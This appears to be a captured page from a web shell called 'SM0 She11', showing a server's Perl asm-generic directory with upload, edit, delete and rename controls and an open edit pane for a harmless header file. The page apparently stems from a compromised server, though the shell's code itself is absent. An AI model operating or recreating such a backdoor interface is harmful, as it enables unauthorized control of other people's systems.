SM0 She11
Path:
/
/
usr
/
lib64
/
perl5
/
asm-generic
Full Path (server): /usr/lib64/perl5/asm-generic
Create Fil3
Upl04d Fil3
📄 bitsperlong.ph
[E]
[D]
[R]
📄 ioctl.ph
[E]
[D]
[R]
📄 ioctls.ph
[E]
[D]
[R]
📄 posix_types.ph
[E]
[D]
[R]
📄 socket.ph
[E]
[D]
[R]
📄 sockios.ph
[E]
[D]
[R]
📄 termbits.ph
[E]
[D]
[R]
📄 termios.ph
[E]
[D]
[R]
Editing: bitsperlong.ph
require '_h2ph_pre.ph'; no warnings qw(redefine misc); unless(defined(&__ASM_GENERIC_BITS_PER_LONG)) { eval 'sub __ASM_GENERIC_BITS_PER_LONG () {1;}' unless defined(&__ASM_GENERIC_BITS_PER_LONG); unless(defined(&__BITS_PER_LONG)) { eval 'sub __BITS_PER_LONG () {32;}' unless defined(&__BITS_PER_LONG); } } 1;
Save